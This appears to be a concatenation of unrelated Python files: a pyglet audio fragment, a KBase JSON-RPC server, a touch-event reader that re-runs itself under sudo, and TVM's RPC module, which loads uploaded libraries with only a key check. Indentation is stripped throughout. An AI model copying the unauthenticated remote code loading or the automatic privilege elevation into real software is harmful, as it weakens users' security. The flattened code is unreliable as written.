The orientation is given as a tuple of floats (x, y, z), and has
no unit. The forward orientation should be orthogonal to the
up orientation.
:type: 3-tuple of float
''')
def _set_up_orientation(self, orientation):
raise NotImplementedError('abstract')
up_orientation = property(lambda self: self._up_orientation,
lambda self, o: self._set_up_orientation(o),
doc='''A vector giving the "up" orientation
of the listener.
The orientation is given as a tuple of floats (x, y, z), and has
no unit. The up orientation should be orthogonal to the
forward orientation.
:type: 3-tuple of float
''')
class _LegacyListener(AbstractListener):
def _set_volume(self, volume):
get_audio_driver().get_listener().volume = volume
self._volume = volume
def _set_position(self, position):
get_audio_driver().get_listener().position = position
self._position = position
def _set_forward_orientation(self, forward_orientation):
get_audio_driver().get_listener().forward_orientation = \
forward_orientation
self._forward_orientation = forward_orientation
def _set_up_orientation(self, up_orientation):
get_audio_driver().get_listener().up_orientation = up_orientation
self._up_orientation = up_orientation
#: The singleton `AbstractListener` object.
#:
#: :deprecated: Use `AbstractAudioDriver.get_listener`
#:
#: :type: `AbstractListener`
listener = _LegacyListener()
class AbstractSourceLoader(object):
def load(self, filename, file):
raise NotImplementedError('abstract')
class AVbinSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import avbin
return avbin.AVbinSource(filename, file)
class RIFFSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import riff
return riff.WaveSource(filename, file)
def load(filename, file=None, streaming=True):
'''Load a source from a file.
Currently the `file` argument is not supported; media files must exist
as real paths.
:Parameters:
`filename` : str
Filename of the media file to load.
`file` : file-like object
Not yet supported.
`streaming` : bool
If False, a `StaticSource` will be returned; otherwise (default) a
`StreamingSource` is created.
:rtype: `Source`
'''
source = get_source_loader().load(filename, file)
if not streaming:
source = StaticSource(source)
return source
def get_audio_driver():
global _audio_driver
if _audio_driver:
return _audio_driver
_audio_driver = None
for driver_name in fos.lib.pyglet.options['audio']:
try:
if driver_name == 'pulse':
from drivers import pulse
_audio_driver = pulse.create_audio_driver()
break
elif driver_name == 'openal':
from drivers import openal
_audio_driver = openal.create_audio_driver()
break
elif driver_name == 'directsound':
from drivers import directsound
_audio_driver = directsound.create_audio_driver()
break
elif driver_name == 'silent':
_audio_driver = get_silent_audio_driver()
break
except:
if _debug:
print 'Error importing driver %s' % driver_name
return _audio_driver
def get_silent_audio_driver():
global _silent_audio_driver
if not _silent_audio_driver:
from drivers import silent
_silent_audio_driver = silent.create_audio_driver()
return _silent_audio_driver
_audio_driver = None
_silent_audio_driver = None
def get_source_loader():
global _source_loader
if _source_loader:
return _source_loader
try:
import avbin
_source_loader = AVbinSourceLoader()
except ImportError:
_source_loader = RIFFSourceLoader()
return _source_loader
_source_loader = None
try:
import avbin
have_avbin = True
except ImportError:
have_avbin = False
|
prcontigfilterServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
import requests.packages.urllib3
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'prcontigfilter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
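# A hypothetical sketch of the deployment file read above (the URL is a
# placeholder, not a real endpoint); the section name defaults to
# 'prcontigfilter' unless KB_SERVICE_NAME overrides it:
#
#   # file pointed to by KB_DEPLOYMENT_CONFIG
#   [prcontigfilter]
#   job-service-url = https://example.org/services/job_service
#   dont_trust_x_ip_headers = false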
config = get_config()
from prcontigfilter.prcontigfilterImpl import prcontigfilter
impl_prcontigfilter = prcontigfilter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['prcontigfilter.filter_contigs_async'] = ['prcontigfilter', 'filter_contigs']
async_check_methods['prcontigfilter.filter_contigs_check'] = ['prcontigfilter', 'filter_contigs']
sync_methods['prcontigfilter.filter_contigs'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
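# For reference, the JSON-RPC 1.1 body that _call() posts for run_job looks
# roughly like this (the id is random; the params value is whatever the
# caller supplies):
#
#   {"method": "KBaseJobService.run_job",
#    "params": [run_job_params],
#    "version": "1.1",
#    "id": "6183725409..."}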
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
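# Example of the header precedence above (addresses are made up): with
# HTTP_X_FORWARDED_FOR set to '10.1.2.3, 172.16.0.1' the first hop '10.1.2.3'
# is returned; setting dont_trust_x_ip_headers = true in the service config
# makes the function fall back to REMOTE_ADDR instead.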
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'prcontigfilter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_prcontigfilter.filter_contigs,
name='prcontigfilter.filter_contigs',
types=[dict])
self.method_authentication['prcontigfilter.filter_contigs'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"prcontigfilter but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service
# listening on port 9999 by default, execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
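# Hedged usage sketch for local testing (the port number is illustrative):
#
#   port = start_server(host='localhost', port=9999, newprocess=True)
#   # ... issue JSON-RPC POSTs to http://localhost:<port>/ ...
#   stop_server()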
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
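# A minimal sketch of driving the async CLI path above directly; every file
# name and the "MyModule.my_method" method name are hypothetical placeholders.
def _example_async_cli():
    with open('/tmp/async_input.json', 'w') as f:
        json.dump({'method': 'MyModule.my_method', 'params': []}, f)
    code = process_async_cli('/tmp/async_input.json', '/tmp/async_output.json',
                             token=None)
    print 'async call finished with exit code', code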
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings()
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
win_touch_client.py
|
#!/usr/bin/python
import gtk, wnck
import os, time
import struct
TEST = False
class WinTouch(object):
def __init__(self, event_file):
self.__cb_obj = None
self.__des_file = event_file
self.__fmt = 'LLHHI'
self.__ev_type = 0x1
        # use ev_key = 0x110 for testing; the real touch device reports 0x14a
if TEST:
self.__ev_key = 0x110
else:
self.__ev_key = 0x14a
        # ev_value: 0x0 is key up, 0x1 is key down
self.__ev_value = 0x1
def register_listener(self, obj):
print "register_listener called"
self.__cb_obj = obj
def __touch_event(self,fd, raw):
(t_se, t_use, type, key, value) = struct.unpack(self.__fmt, raw)
if type == self.__ev_type and key == self.__ev_key and value == self.__ev_value:
print "time_sec:%d" % t_se + " time_usec:%x" % t_use + " type:%x" % type + " key:%x" % key + " value:%x" % value
if self.__cb_obj:
print "touch _cb_obj not none"
                self.__cb_obj.on_screen_touched()
else:
print "touch _cb_obj none"
def __get_sudo(self):
import os, sys
args = ['sudo', sys.executable] + sys.argv + [os.environ]
# the next line replaces the currently-running process with the sudo
os.execlpe('sudo', *args)
def __check_sudo(self):
import os, sys
euid = os.geteuid()
while euid != 0:
self.__get_sudo()
print 'win_touch __check_sudo obtain root user'
time.sleep(2)
print 'Running. Your euid is', euid
def exec_touch_event(self):
while not os.path.exists(self.__des_file):
time.sleep(3)
print 'win_touch, open file:', self.__des_file
e_file = open(self.__des_file, 'rb')
read_size = struct.calcsize(self.__fmt)
while True:
try:
                raw = e_file.read(read_size)
if not raw:
continue
self.__touch_event(e_file, raw)
except Exception, e:
print "touch_event loop excp: ", e.message
    def exec_fork(self):
        # create a pipe for parent/child communication
        pr, pw = os.pipe()
        # fork a child process
        subProcessId = os.fork()
        print " ************* do fork"
        if subProcessId == 0:
            # child process
            fork_function()
        else:
            # parent process: nothing else to do here
            pass
class TouchListener(object):
def on_screen_touched(self):
raise Exception("TouchListener.onScreenTouch should be override by sub class")
def run_touch_service(win_ctrl):
import threading
"""
for test
"""
if TEST:
touch_dev = os.path.join('/dev/input/by-path/', 'platform-i8042-serio-1-event-mouse')
winTouch = WinTouch(touch_dev)
else:
touch_dev = os.path.join('/dev/input/by-path/', 'pci-0000:00:1d.0-usb-0:1.1:1.0-event')
winTouch = WinTouch(touch_dev)
winTouch.register_listener(win_ctrl)
winTouchThr = threading.Thread(target=winTouch.exec_touch_event)
winTouchThr.start()
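# A minimal sketch of wiring a callback into the touch service: subclass
# TouchListener, override on_screen_touched, and hand the instance to
# run_touch_service().  _ExampleListener is an illustrative name only.
class _ExampleListener(TouchListener):
    def on_screen_touched(self):
        print 'screen touched'
# run_touch_service(_ExampleListener())  # uncomment to start the listener thread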
def fork_function():
while True:
print '-- fork_function--'
winTouch = WinTouch('/dev/input/event6')
winTouch.register_listener(None)
winTouch.exec_touch_event()
"""test"""
#run_touch_service(None)
|
rpc.py
|
"""RPC interface for easy testing.
RPC enables connect to a remote server, upload and launch functions.
This is useful to for cross-compile and remote testing,
The compiler stack runs on local server, while we use RPC server
to run on remote runtime which don't have a compiler available.
The test program compiles the program on local server,
upload and run remote RPC server, get the result back to verify correctness.
"""
from __future__ import absolute_import
import os
import socket
import struct
import logging
import multiprocessing
import subprocess
import time
from . import util, cc, tar
from ..module import load as _load_module
from .._ffi.function import _init_api, register_func
from .._ffi.ndarray import context as _context
from .._ffi.base import py_str
RPC_MAGIC = 0xff271
RPC_SESS_MASK = 128
def _server_env():
"""Server environment function return temp dir"""
temp = util.tempdir()
# pylint: disable=unused-variable
@register_func("tvm.contrib.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.contrib.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
        # Try to create a shared library on the remote side
if path.endswith(".o"):
logging.info("Create shared library based on %s", path)
cc.create_shared(path + ".so", path)
path += ".so"
elif path.endswith(".tar"):
tar_temp = util.tempdir()
tar.untar(path, tar_temp.temp_dir)
files = [tar_temp.relpath(x) for x in tar_temp.listdir()]
cc.create_shared(path + ".so", files)
path += ".so"
m = _load_module(path)
logging.info("load_module %s", path)
return m
return temp
def _serve_loop(sock, addr):
"""Server loop"""
sockfd = sock.fileno()
temp = _server_env()
_ServerLoop(sockfd)
temp.remove()
logging.info("Finish serving %s", addr)
def _recvall(sock, nbytes):
res = []
nread = 0
while nread < nbytes:
        chunk = sock.recv(min(nbytes - nread, 1024))
        if not chunk:
            raise IOError("connection reset by peer")
        nread += len(chunk)
res.append(chunk)
return b"".join(res)
def _listen_loop(sock):
"""Lisenting loop"""
while True:
conn, addr = sock.accept()
logging.info("RPCServer: connection from %s", addr)
magic = struct.unpack("@i", _recvall(conn, 4))[0]
if magic != RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("@i", _recvall(conn, 4))[0]
key = py_str(_recvall(conn, keylen))
if not key.startswith("client:"):
conn.sendall(struct.pack("@i", RPC_MAGIC + 2))
else:
conn.sendall(struct.pack("@i", RPC_MAGIC))
logging.info("Connection from %s", addr)
process = multiprocessing.Process(target=_serve_loop, args=(conn, addr))
        process.daemon = True
process.start()
# close from our side.
conn.close()
def _connect_proxy_loop(addr, key):
key = "server:" + key
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("@i", RPC_MAGIC))
sock.sendall(struct.pack("@i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("@i", _recvall(sock, 4))[0]
if magic == RPC_MAGIC + 1:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == RPC_MAGIC + 2:
logging.info("RPCProxy do not have matching client key %s", key)
elif magic != RPC_MAGIC:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
logging.info("RPCProxy connected to %s", str(addr))
process = multiprocessing.Process(target=_serve_loop, args=(sock, addr))
        process.daemon = True
process.start()
process.join()
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += out
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a seperate process.
This is a simple python implementation based on multi-processing.
It is also possible to implement a similar C based sever with
TVM runtime which does not depend on the python.
Parameters
----------
host : str
The host url of the server.
port : int
        The port to bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
Whether to use Popen to start a fresh new process instead of fork.
This is recommended to switch on if we want to do local RPC demonstration
for GPU devices to avoid fork safety issues.
key : str, optional
The key used to identify the server in Proxy connection.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
key=""):
self.host = host
self.port = port
self.libs = []
if use_popen:
cmd = ["python",
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
self.proc = multiprocessing.Process(
target=subprocess.check_call, args=(cmd,))
            self.proc.daemon = True
self.proc.start()
time.sleep(1)
elif not is_proxy:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logging.info("RPCServer: bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(self.sock,))
            self.proc.daemon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key))
            self.proc.daemon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
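# A minimal sketch (not part of the original API surface) of standing up a
# standalone RPC server; the host and port range are illustrative values.
def _example_start_server():
    """Start an RPC server bound to the first free port in [9091, 9199)."""
    server = Server("0.0.0.0", port=9091, port_end=9199)
    return server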
class RPCSession(object):
"""RPC Client session module
Do not directly create the obhect, call connect
"""
# pylint: disable=invalid-name
def __init__(self, sess):
self._sess = sess
self._tbl_index = _SessTableIndex(sess)
self._remote_funcs = {}
def get_function(self, name):
"""Get function from the session.
Parameters
----------
name : str
The name of the function
Returns
-------
f : Function
The result function.
"""
return self._sess.get_function(name)
def context(self, dev_type, dev_id=0):
"""Construct a remote context.
Parameters
----------
dev_type: int or str
dev_id: int, optional
Returns
-------
ctx: TVMContext
The corresponding encoded remote context.
"""
ctx = _context(dev_type, dev_id)
encode = (self._tbl_index + 1) * RPC_SESS_MASK
ctx.device_type += encode
ctx._rpc_sess = self
return ctx
def cpu(self, dev_id=0):
"""Construct remote CPU device."""
return self.context(1, dev_id)
def gpu(self, dev_id=0):
"""Construct remote GPU device."""
return self.context(2, dev_id)
def cl(self, dev_id=0):
"""Construct remote OpenCL device."""
return self.context(4, dev_id)
def metal(self, dev_id=0):
"""Construct remote Metal device."""
return self.context(8, dev_id)
def ext_dev(self, dev_id=0):
"""Construct remote extension device."""
return self.context(12, dev_id)
def upload(self, data, target=None):
"""Upload file to remote runtime temp folder
Parameters
----------
data : str or bytearray
The file name or binary in local to upload.
target : str, optional
The path in remote
"""
if isinstance(data, bytearray):
if not target:
